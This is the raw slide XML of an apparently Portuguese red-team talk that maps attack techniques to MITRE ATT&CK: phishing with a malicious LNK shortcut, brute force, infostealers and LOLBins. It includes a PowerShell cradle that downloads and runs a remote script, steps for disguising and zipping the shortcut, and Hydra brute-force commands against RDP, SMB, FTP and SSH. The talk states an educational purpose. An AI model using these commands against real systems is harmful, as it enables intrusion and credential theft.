          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4000598" y="369055"/>
            <a:ext cx="777831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Acesso Inicial: Phishing com anexos maliciosos (T1566.001)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8" name="Google Shape;131;p5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{09CBEDFD-635E-405A-6B34-3DD70B4C2ADF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2038350" y="3319572"/>
            <a:ext cx="220430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3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RevShell</a:t>
            </a:r>
            <a:endParaRPr lang="pt-B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29AF139-528D-F663-1B1E-A2AAB0E155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0943" y="1241233"/>
            <a:ext cx="5487355" cy="5522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6399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A82C1881-7DB2-3241-15F7-398DCB52A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3A33121C-AB61-B472-7B80-9A606D3CC9F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="764450" y="530352"/>
            <a:ext cx="10627500" cy="6139161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CB5C57A2-21C5-7E21-9C8D-2B36DE5DA5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-204016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7A4C62E-C4FF-4802-E714-FE64A54DD74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-119304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C3B3EF3F-E863-99D6-82F5-557BAE51286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260558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D8321AA5-A989-B797-7326-E5A2DAB80DD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8643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B01100B1-1F7D-F52F-833A-7B92BEF9353F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4000598" y="414922"/>
            <a:ext cx="777831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Acesso Inicial: Phishing com anexos maliciosos (T1566.001)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10" name="Google Shape;131;p5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5AD7D34-DFCC-6E33-F911-17ED72612214}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1255794" y="1337913"/>
            <a:ext cx="671663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Subir um servidor web na máquina do atacante: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343E233-8227-302E-3C5F-2E55E2CE02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794" y="1842101"/>
            <a:ext cx="5257800" cy="485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131;p5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E54380A-038A-0DE8-E0AE-3DEAA87E3E0D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1255793" y="2429667"/>
            <a:ext cx="6716631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Encodando o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payload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powershell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em base64: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$Command = "IEX (IWR 'http://172.22.196.126/atualizacao.ps1')"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System.Convert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]::ToBase64String([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System.Text.Encoding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]::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Unicode.GetBytes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($Command))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2B807B4-D1B8-B8D9-6145-F1DD4ACBC2A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1255793" y="2808549"/>
            <a:ext cx="6716631" cy="10060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Google Shape;131;p5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7FE3EED7-C848-DAEA-F8A1-7F63DE0CEBCF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1255793" y="4757443"/>
            <a:ext cx="8528287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/>
              <a:t>Criando o Atalho LNK Malicioso</a:t>
            </a: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Clique com o botão direito na área de trabalho ou em uma pasta &gt; Novo &gt; Atalho.</a:t>
            </a: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campo "Digite o local do item", insira o comando completo que criamos, com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payload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encodado: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powershell.exe -w 1 -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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&lt;SEU_BASE64_AQUI&gt;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34E043C-6A67-D988-4B12-5F55C0AFFB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5793" y="3963840"/>
            <a:ext cx="9314672" cy="6781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89603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787AE524-B692-CD4F-116F-E40389B08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96EDF750-A354-602D-758B-21C8AB2A1507}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="764450" y="923544"/>
            <a:ext cx="10627500" cy="5745969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74AABB13-132E-FB7E-119F-A0FDAA0D2C2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-76000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0C7B5A6C-F5F2-8911-3D29-7809738BBEE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8712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E761CC8A-4760-C571-6849-BF94A332260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388574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85039830-8697-9965-A457-7184241128A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8643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211E6180-721F-90A8-BDB8-6D31E8285202}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3801766" y="851217"/>
            <a:ext cx="777831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Acesso Inicial: Phishing com anexos maliciosos (T1566.001)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9B2885A-CEF1-3B8D-2986-38E8763DBF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369" y="4386137"/>
            <a:ext cx="4039970" cy="2083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Google Shape;131;p5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18FC595F-3F34-5C67-A189-BFEF7F62A3C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5676670" y="1559959"/>
            <a:ext cx="43660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Alterar ícone: Botão direito &gt; Propriedades &gt; Alterar ícone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A1CBF54-4BC1-9E94-5A90-42361DEB8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1856" y="1966304"/>
            <a:ext cx="2015642" cy="444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537D0A6-0557-B31C-774A-BB960DFA5E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098" y="1778845"/>
            <a:ext cx="4478511" cy="24674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53C3285-9E5D-4417-E50F-60A0FE9AE6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3639" y="2824286"/>
            <a:ext cx="4024274" cy="3801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Google Shape;131;p5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F51B14A-E984-CA86-BAA6-23A5204581E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5754257" y="2484906"/>
            <a:ext cx="43660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Zipar o arquivo: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771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247C8EE7-BA61-E4FD-8DFA-A095878FC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A537B0DA-FC84-FAF0-23BE-9880F4E35BA1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="764450" y="923544"/>
            <a:ext cx="10627500" cy="5745969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33B83E4C-6F7F-ED77-3AAD-F41BF9E1F93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-76000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1E42E2C5-775B-1D83-127E-399AA7C3307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8712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0E8BDB9B-CC49-37D7-3282-69B90F26643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388574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D2BF8F95-0A45-E469-3AB9-A8693061B1A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8643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82D4494A-126E-77FB-AA2E-DED7066223A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3801766" y="814641"/>
            <a:ext cx="777831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Acesso Inicial: Phishing com anexos maliciosos (T1566.001)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13" name="Google Shape;131;p5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2C32261-738D-6063-AAAB-632006C97323}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="864800" y="1656203"/>
            <a:ext cx="53939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Após a vítima dar 2 cliques no arquivo, tivemos acesso a máquina dela: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CAE254-11F3-9692-D037-274AA2166C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6983" y="2076259"/>
            <a:ext cx="7778318" cy="45497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00919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A8B4FBAB-A2D3-8CE2-1CF2-94EF1A0F0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F5BB1861-7030-FBC0-7D57-9BEB0E197139}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="764450" y="1325025"/>
            <a:ext cx="10627500" cy="5344488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8B6E0184-13D0-CC95-3E59-F76709F155C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253184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D03A44D8-5E34-61E2-094A-F2A45FCE86E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337896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DAA3A4EE-C631-7BBB-1F68-0537334810A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717758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F704441A-34A7-D3F4-F1E8-8B847490AD0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8427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31AFAE96-919B-F1FD-708E-295A582FF30E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3765190" y="1325025"/>
            <a:ext cx="777831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Credential</a:t>
            </a:r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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="24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Stuffing</a:t>
            </a:r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 (</a:t>
            </a:r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T1110.003 e T1589.001</a:t>
            </a:r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3" name="Google Shape;131;p5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86E1D919-CBC1-37A8-051E-D126A3CB0533}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1255793" y="1947841"/>
            <a:ext cx="828129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pt-BR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Buscar credenciais vazadas para acessar sistemas e aplicações.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00C8D7F-959F-019D-0B22-1A7F90BF09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793" y="2363299"/>
            <a:ext cx="8869913" cy="42415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9982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DB21B9A7-1FE7-C905-391D-7E8BE07E8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7A7970E2-97F3-A0F1-A796-91766273E530}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="764450" y="1325024"/>
            <a:ext cx="10627500" cy="4815218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7E4E8B4F-ACBD-796F-5246-3BBF0FF2F53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253184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433E583-6315-B8A6-F842-CD5A3297AD6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337896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C9C6A5D6-2C8C-12B3-F28B-9007523F2D5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717758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032F90E5-D98C-953D-B7EC-EB42AF4010C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17243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36C7EDBA-A690-06F7-0B2A-3E433F51B75D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3758386" y="1352192"/>
            <a:ext cx="777831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Acesso de credencial: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="24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Brute</a:t>
            </a:r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 Force (</a:t>
            </a:r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T1110</a:t>
            </a:r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8" name="Google Shape;131;p5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73B635F8-A474-76C6-F02D-24776636A54F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1055768" y="2183431"/>
            <a:ext cx="828129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r>
              <a:rPr lang="pt-BR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pt-BR" sz="18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Acessar serviços expostos (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1800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rdp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="18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, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1800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ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="18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, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1800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smb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="18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...) utilizando credenciais vazadas ou com uma lista </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1800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pré</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="18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criada.</a:t>
            </a:r>
            <a:endParaRPr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Google Shape;131;p5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5059C43-5BD6-C6CA-E013-21DC6BD9E802}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1055768" y="3383991"/>
            <a:ext cx="8762532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RDP: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="17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hydra</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="17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-f -I -V -L valid_users.txt -P rdp_pass.txt -M rdp_hosts.txt </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="17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rdp</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="17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SMB: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="17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hydra</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="17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-f -I -V -L valid_users.txt -P smb_pass.txt -M smb_hosts.txt </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="17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smb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="17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FTP: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="17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hydra</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="17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-f -v -I -L valid_users.txt -p Hackingnaweb@2025 187.65.43.21 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="17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ftp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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SSH: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="17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hydra</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="17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-V -I -f -l </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="17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teste.user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="17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-P ssh_passwords.txt -M ssh_hosts.txt </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="17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ssh</a:t>
            </a:r>
            <a:endParaRPr sz="17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Google Shape;131;p5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2816D2C-7A38-E7AB-1D5E-67A7ACE9AAD8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1055768" y="5168502"/>
            <a:ext cx="8762532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-f = finalizar quando achar uma </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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cred</a:t>
            </a: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válida| -V = modo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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verbose</a:t>
            </a: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-I = ignorar os 10 segundos | -L = lista de usuários |-P = lista de senhas | -M = lista de hosts</a:t>
            </a:r>
            <a:endParaRPr sz="17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098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A89F2E80-5D14-EA69-5D1A-4E600147E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AF84C665-60FF-0B5E-DD16-7997D7336015}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="764450" y="638175"/>
            <a:ext cx="10627500" cy="6031338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BDBEB4C8-57E3-8963-CB5C-F7628E3D92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-204016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EFB2A200-68AD-06CA-DAC7-57465BE2683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-119304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1AD972D3-5792-ED26-5898-F0B50216D59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260558"/>
            <a:ext cx="2513427" cy="63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19A27D26-55FD-5CC9-C507-513878A978A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3775209" y="560060"/>
            <a:ext cx="777831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Acesso de credenciais: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="24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Credentials</a:t>
            </a:r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pt-BR" sz="24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from</a:t>
            </a:r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 Web Browsers /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="24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Infostealer</a:t>
            </a:r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 (</a:t>
            </a:r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T1555</a:t>
            </a:r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3" name="Google Shape;131;p5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F46425FF-950B-9F20-90B5-8B72141F9259}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="851368" y="1532206"/>
            <a:ext cx="566458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r>
              <a:rPr lang="pt-BR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pt-BR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Roubar credenciais, cookies, chaves, cartões e tudo que esteja salvo no navegador.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2D47CF-9942-4429-082B-5622C614F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867" y="1725085"/>
            <a:ext cx="5549231" cy="4855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4D88904-6924-BDBB-B9D7-686C1B4300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593" y="2626279"/>
            <a:ext cx="5549231" cy="2777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26370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CB0FAB88-CBEA-AF59-3D6E-2A6D9A816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26F4777B-A6B0-28B7-7D21-933822B98A45}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="764450" y="638175"/>
            <a:ext cx="10627500" cy="6031338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6FD1A5E6-52D9-9095-5AD0-595EDC0CB96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-204016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58E4D400-7DBC-C1AF-2B9C-92285B4FDC4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-119304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C0C3785B-7488-7212-0204-441158A62DA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260558"/>
            <a:ext cx="2513427" cy="63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FC4B2E69-E1AD-D9C1-383E-D35795C0AA3E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3900250" y="622472"/>
            <a:ext cx="151002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LOLBins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3" name="Google Shape;131;p5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83C54E21-1CD6-8E18-0993-4297D36839FD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="830770" y="2574940"/>
            <a:ext cx="3758171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r>
              <a:rPr lang="pt-B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pt-BR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Utilizar ferramentas nativa do sistema para realizar ataques e dificultar o monitoramento da defesa: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https://lolbas-project.github.io</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR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DC038F-1531-805A-A2E5-0910A4554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5261" y="1176440"/>
            <a:ext cx="6548911" cy="532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3569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9FF03C69-3EF7-26FD-4076-C814F2EDB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C6EBBF57-D931-B178-B93D-8D8FDD4A5090}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="764450" y="1681641"/>
            <a:ext cx="10627500" cy="3301839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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA0DEB63-2C07-2B8C-95E3-9DC574AD4AD3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1187728" y="2757354"/>
            <a:ext cx="82143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 algn="just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As vulnerabilidades apresentadas não refletem a real situação da minha empresa atual e/ou empresas anteriores.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="just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Tudo que for mostrado aqui tem como foco a disseminação de conhecimento e não o incentivo de atos criminosos.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="just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Só execute estes testes em ambientes que você possuir permissão.</a:t>
            </a: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D839921E-9386-E8CF-E11B-22EA6C2A74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454352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26EF86D9-75C5-7CC8-AFCA-9091880B962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539064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1F60B445-8408-0538-E936-8A1400675C9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918926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57FCB414-792E-59FE-C5DE-9D38B0A3146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02028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1D8ACC78-9374-0AED-5559-093A9E93CEEE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3900250" y="1751314"/>
            <a:ext cx="3720956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Public Sans Black"/>
              </a:rPr>
              <a:t>Disclaimer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3398578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007F15F1-C29D-C0CE-FB9A-0EE54BB08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E22C07B5-E1D8-A689-CD8D-FD34330475B1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="764450" y="638175"/>
            <a:ext cx="10627500" cy="6031338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C3A5FCB7-D374-71E6-4A88-FF9BE2D5E2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-204016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5D16E38-6054-37B7-359D-EC86B020ECA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-119304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9532C5C7-6164-7695-96F5-4188A73C8AF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260558"/>
            <a:ext cx="2513427" cy="63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37A8B61A-7303-F10C-64C9-B0C679888528}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3900250" y="579246"/>
            <a:ext cx="174159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8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LOLBins</a:t>
            </a:r>
            <a:endParaRPr sz="12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3" name="Google Shape;131;p5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{780B2790-47FB-07B3-8D55-D1E18A728C73}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="800050" y="1305059"/>
            <a:ext cx="988014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Estudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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Um estudo feito pelo time de defesa da Kaspersky, apontou as seguintes ferramentas de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="16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LOLBins</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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mais utilizadas em ataques.</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="16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4" name="Google Shape;131;p5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{657A749F-B8DA-DA7B-A409-14505842EEA3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7658792" y="6343567"/>
            <a:ext cx="397237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 sz="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Referência: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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https://www.kaspersky.com.br/blog/most-used-lolbins/18302/</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="8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6" name="Google Shape;131;p5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5509E860-15B4-E7B7-5341-02B3232ACBB7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="864800" y="2239893"/>
            <a:ext cx="1019944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b="1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PowerShell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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(~20,3%) = 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Shell e linguagem de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scripting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Windows para automação e administração. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="5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Ataques: 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execução de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payloads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download remoto, execução de post-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exploit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carregamento de módulos maliciosos.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DD29078-3C1F-86D0-9720-5D393F22B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784" y="3086552"/>
            <a:ext cx="5414979" cy="3478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0876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73AE671E-6A24-4926-EA9B-C7088E1B7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577B1EB4-430B-3FE7-F0AF-7D05F40390B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="764450" y="638175"/>
            <a:ext cx="10627500" cy="6031338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78E27258-5559-0170-B6F9-18753CF4AE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-313744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348DAC19-A981-19A3-3F26-DFA0F79ACC6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-229032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1EA61FCB-53AF-D55A-3066-80FCC647C3D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150830"/>
            <a:ext cx="2513427" cy="63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E0B6A68F-15DE-487B-1F0E-9DAE0E8BED41}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3900250" y="622472"/>
            <a:ext cx="151002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LOLBins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4" name="Google Shape;131;p5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0228D041-8A57-1558-F1F0-200F6950780F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7686224" y="6425863"/>
            <a:ext cx="397237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 sz="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Referência: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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https://www.kaspersky.com.br/blog/most-used-lolbins/18302/</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="8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6" name="Google Shape;131;p5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C9079E1-3C8F-B079-B9B5-F0D32F9C2172}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="837368" y="1170092"/>
            <a:ext cx="1052715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te.exe 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(~7,2%) = Ferramenta TAEF para executar testes; pode executar WSH/DLL.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Ataques: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execução de testes/execução de componentes que carregam scripts ou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DLLs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 ofuscação de atividade legítima.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F960B7C-7966-C84F-2FB2-5F21C6E56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088" y="1900329"/>
            <a:ext cx="8324920" cy="4493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9809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13AB2C78-523B-1721-2C9A-5FC05788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99143821-587F-BFDB-C376-AA8D23BC3C1D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="764450" y="638175"/>
            <a:ext cx="10627500" cy="6031338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9B21CC56-36C4-7958-FC6A-C03583BE7B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-258880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2F4843C4-29A5-1B7B-78A0-F02C737E5C9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-183312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D01CC133-12FF-63D5-D949-37F2EF7DD88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187406"/>
            <a:ext cx="2513427" cy="63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6C7DE7F8-CF3A-F019-078A-50AAABBC83F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3900250" y="622472"/>
            <a:ext cx="151002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LOLBins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4" name="Google Shape;131;p5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{339A0ADC-7DC7-E43A-9634-80701CE17121}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
